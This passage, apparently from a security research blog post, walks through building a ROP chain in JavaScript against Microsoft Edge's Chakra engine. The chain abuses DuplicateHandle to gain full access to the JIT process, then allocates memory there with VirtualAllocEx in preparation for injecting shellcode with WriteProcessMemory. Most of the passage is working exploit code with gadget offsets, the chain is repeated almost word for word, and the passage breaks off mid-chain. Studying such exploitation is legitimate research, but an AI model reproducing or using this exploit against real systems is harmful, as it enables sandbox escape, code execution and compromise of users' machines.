possible, as ACG is disabled. The main caveat here is that it cannot directly and remotely be marked as RWX. At first, I tried allocating with RWX memory, thinking I could just do simple process injection. However, after testing and the API call failing, it turns our RWX memory can’t directly be allocated when the injection stems from a process protected by ACG to a non-ACG process. This will all make more sense later, if it doesn’t now, when we copy our ROP chain in to the JIT process.

Here is the ROP chain we will be working with (we will include our DuplicateHandle chain for continuity. Every ROP chain from here on out will be included with the previous one to make readability a bit better):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Let’s start by setting a breakpoint on our first ROP gadget of pop rax ; ret, which is located at chakra_base + 0x577fd4. Our DuplicateHandle ROP chain uses this gadget two times. So, when we hit our breakpoint, we will hit g in WinDbg to jump over these two calls in order to debug our VirtualAllocEx ROP chain.

This ROP chain starts out by attempting to act on the R9 register to load in the flAllocationType parameter. This is done via the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget. As we previously discussed, the RCX register is used to copy the final parameter into R9. This means we need to place MEM_COMMIT | MEM_RESERVE into the RCX register, and let our target gadget copy the value into R9. However, we know that the RAX register is dereferenced. This means our first few gadgets:

  1. Place a valid pointer in RAX to bypass the cmp r8d, [rax] check
  2. Place 0x3000 (MEM_COMMIT | MEM_RESERVE) into RCX
  3. Copy said value in R9 (along with an add rsp, 0x28 which we know how to deal with by adding 0x28 bytes of padding)

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	-
	-
	-
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

After R9 gets filled properly, our next step is to work on the dwSize parameter, which will go in R8. We can directly copy a value into R8 using the following ROP gadget: mov r8, rdx ; add rsp, 0x48 ; ret. All we have to do is place our intended value into RDX prior to this gadget, and it will be copied into R8 (along with an add rsp, 0x48 - which we know how to deal with by adding some padding before our ret). The value we are going to place in R9 is 0x1000 which isn’t the exact size of our shellcode, but it will give us a good amount of space to work with as 0x1000 is more room than we actually need.

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	-
	-
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

The next parameter we will focus on is the lpAddress parameter. In this case, we are setting this value to NULL (or 0 in our case), as we want the OS to determine where our private allocation will be within the JIT process. This is done by simply popping a 0 value, which we can directly write to the stack after our pop rdx gadget using the write primitive, into RDX.

After executing the above ROP gadgets, our call to VirtualAllocEx is in the following state:

VirtualAllocEx(
	-
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

At this point we have supplied 3/5 arguments for VirtualAllocEx. Our second-to-last parameter will be the hProcess parameter - which is our now duplicated-handle to the JIT server with PROCESS_ALL_ACCESS permissions. Here is how this code snippet looks:

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

We can notice two things here - recall we stored the handle in an empty address within .data of chakra.dll. We simply can pop this pointer into RCX, and then dereference it to get the raw handle value. This arbitrary dereference gadget, where we can extract the value RCX points to, is followed by a write operation at the memory address in RAX + 0x20. Recall we already have placed a writable address into RAX, so we simply can move on knowing we “bypass” this instruction, as the write operation won’t cause an access violation - the memory in RAX is already writable.

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

The last thing we need to do is twofold:

  1. Place VirtualAllocEx into RAX
  2. Directly write our last parameter at RSP + 0x28 (we have already explained why RSP + 0x28 instead of RSP + 0x20) (this is done via our arbitrary write and not via a ROP gadget)
  3. jmp rax to kick off the call to VirtualAllocEx

Again, as a point of reiteration, we can see we simply can just write our last parameter to RSP + 0x28 instead of using a gadget to mov [rsp+0x28], reg.

write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();

When this occurs, our call will be in the following (final) state:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable
);

We can step into the jump with t and then use pt to hit the ret of VirtualAllocEx. At this point, as is generally true in assembly, RAX should contain the return value of VirtualAllocEx - which should be a pointer to a block of memory within the JIT process, size 0x1000, and RW.

If we try to examine this address within the debugger, we will see it is invalid memory.

However, if we attach a new WinDbg session (without closing out the current one) to the JIT process (we have already shown multiple times in this blog post how to identify the JIT process) we can see this memory is committed.

As we can see, our second ROP chain was successful and we have allocated a page of RW memory within the JIT process. We will eventually write our shellcode into this allocation and use a final-stage ROP chain we will inject into the JIT process to mark this region as RWX.

WriteProcessMemory ROP Chain

At this point in our exploit, we have seen our ability to control memory within the remote JIT process - where ACG is disabled. As previously shown, we have allocated memory within the JIT process. Additionally, towards the beginning of the blog, we have stored our shellcode in the .data section of chakra.dll (see “Shellcode” section). We know this shellcode will never become executable in the current content process (where our exploit is executing) - so we need to inject it into the JIT process, where ACG is disabled. We will setup a call to WriteProcessMemory in order to write our shellcode into our new allocation within the JIT server.

Here is how our call to WriteProcessMemory will look:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode)				// Size of our shellcode
	NULL 						// Optional
);

Here is the instrumentation of our ROP chain (including DuplicateHandle and VirtualAllocEx for continuity purposes):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
